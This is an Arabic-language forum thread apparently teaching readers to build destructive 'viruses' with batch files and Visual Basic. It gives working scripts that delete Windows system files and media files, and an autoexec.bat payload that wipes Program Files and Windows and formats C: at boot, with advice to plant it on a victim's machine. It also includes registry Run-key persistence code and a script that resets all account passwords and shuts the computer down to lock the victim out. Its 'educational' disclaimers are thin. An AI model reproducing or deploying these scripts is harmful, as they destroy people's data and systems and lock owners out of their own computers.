- بواسطة x32x01 ||
الفيروس ده عبارة عن برنامج صغير جداً بيشتغل من نفسه من غير ما المستخدم يحس بيه. أحياناً بيشتغل عن طريق إنه يرتبط ببرنامج من برامج الويندوز.
في فيروسات بتشتغل فى وقت معين بناءاً على الساعة أو التاريخ بتاع الجهاز. أشهر واحد هو فيروس تشرنوبل (تشيرنوبل) اللي بيشتغل يوم 26 من كل شهر.
سمي فيروس عشان شبه الفيروسات الحقيقية اللي بتصيب جسم الإنسان وبتروح تتكاثر بسرعة وتخرب كل حاجة.
الخطوات:
لو حطيت الكود ده، أي جهاز عليه قرص E: وبه صور أو أغاني أو أفلام بالامتدادات دي، كلهم هيتشالو في ثواني.
يتبع ...
في فيروسات بتشتغل فى وقت معين بناءاً على الساعة أو التاريخ بتاع الجهاز. أشهر واحد هو فيروس تشرنوبل (تشيرنوبل) اللي بيشتغل يوم 26 من كل شهر.
سمي فيروس عشان شبه الفيروسات الحقيقية اللي بتصيب جسم الإنسان وبتروح تتكاثر بسرعة وتخرب كل حاجة.
شروط لازم تتوفر عشان الفيروس يكون فعال ✅
- يكون حجمه صغير عشان محدش ياخد باله منه.
- يعتمد على نفسه فى التشغيل أو يرتبط بملف من ملفات النظام.
- يكون ليه هدف واضح (تخريب، سرقة بيانات، أو تعطيل جهاز).
تحذير خطير جداً قبل ما تبدأ ⚠️
لو لسه بتتعلم أو بتخاف من التعامل مع الفيروسات، ياريت تكتفي بالفهم النظري بس ومتجربش حاجة على جهازك الشخصي. أي غلطة فى الكود ممكن تدمر نظام التشغيل بتاعك بالكامل. أنا مش مسؤول عن أي ضرر يحصل ليك لو جربت الكود من غير ما تكون فاهم.طرق صناعة الفيروسات (إيه المتاح قدامك؟) 🛠️
أنا لما دورت على النت لقيت 3 طرق رئيسية لعمل فيروسات:- عن طريق المفكرة (Notepad) 📝
- عن طريق لغات البرمجة زي VB، C#، Python، C 💻
- عن طريق برامج جاهزة لصناعة الفيروسات (خطيرة جداً بس معظمها مكتشف من antivirus) 🦠
ازاي تعمل فيروس بالمفكرة (Notepad) خطوة بخطوة 📓
دي أسهل طريقة ومحتاجين بس نعرف ازاي نكتب الكود ونحفظه.الخطوات:
- افتح Notepad (المفكرة).
- اكتب الكود اللي أنا هديهولك.
- احفظ الملف بـ اسم أي حاجة بس امتداده يكون .bat (مثلاً: virus.bat).
أول كود فيروس (مسح ملفات النظام) 💀
Code:
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.y شرح الكود 🧠
@Echo off: بيخفي الأوامر عن المستخدم عشان منظر احترافي.c:: بيروح على قرص C (القرص الأساسي).cd %WinDir%\System\: بيروح لمكان ملفات النظام بتاعة الويندوز.deltree /y *.dll: بيأمر الجهاز إنه يمسح كل الملفات اللي امتدادها.dllمن غير ما يسأل (/y).deltree /y *.sys: بيروح يمسح كل ملفات.sys(ملفات النظام).
ازاي تعدل الكود بنفسك؟ 🔧
تقدر تغير حاجتين:- نوع الملفات اللي هتتمسح (زي
.jpgأو.mp3أو.exe). - مكان الفيروس (القرص اللي هيشتغل عليه زي D: أو E🙂.
مثال عملي: فيروس يمسح الصور والأغاني والأفلام من قرص E: 🎬
Code:
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf نصائح مهمة قبل ما تكتب أي كود 🧼
- متجربش على جهازك الأساسي أبداً.
- لو عايز تتعلم، استخدم برنامج VirtualBox أو جهاز قديم مش مهم.
- أغلب برامج الحماية (Antivirus) هتتكشف الفيروسات دي علطول لأنها معروفة.
- الغرض من المقال هو التعليم والفهم، مش التخريب.
الخلاصة (كلمة أخيرة) 🎯
صناعة الفيروسات مش صعبة، لكنها خطيرة جداً. لو فهمت إزاى الفيروس بيشتغل، هتقدر تحمي نفسك منه أحسن. أهم حاجة إنك متبقاش الشخص اللي بيستخدم العلم ده فى أذى الناس.يتبع ...
- بواسطة x32x01 ||
Code:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود :
فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه
Code:
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat Code:
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat Code:
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat echo format c: /q /u /autotest >nul >>c:\autoexec.bat
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى
Code:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat - بواسطة x32x01 ||
Code:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصـــية الأولى :-
Code:
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2 الخاصــــــــــــــية الثانيه :-
Code:
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\windows\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub - بواسطة x32x01 ||
برمجة فيرس لأغلاق جهاز الضحية ووضع لة كلمة مرور .. لا يستطيع فتح الجهاز بعدها
الا بعد أدخال كلمة المرور ( لا تستخدمه مع أصدقائك )
تابع معايا الكود ده الا بعد أدخال كلمة المرور ( لا تستخدمه مع أصدقائك )
Code:
echo off@
break off
net user%USERNAME%123456
net user administrator 123456
net user Guest 123456
shutdown -s -f -t 0
exit ( ليس للأبداع حدود )
ممكن تعمل أى حاجة تخطر على ذهنك بالأكواد
ممكن تعمل أى حاجة تخطر على ذهنك بالأكواد
مواضيع مشابهة
- الردود
- 0
- المشاهدات
- 17
x32x01
- الردود
- 0
- المشاهدات
- 14
x32x01
- الردود
- 2
- المشاهدات
- 31
x32x01
- الردود
- 0
- المشاهدات
- 17
x32x01
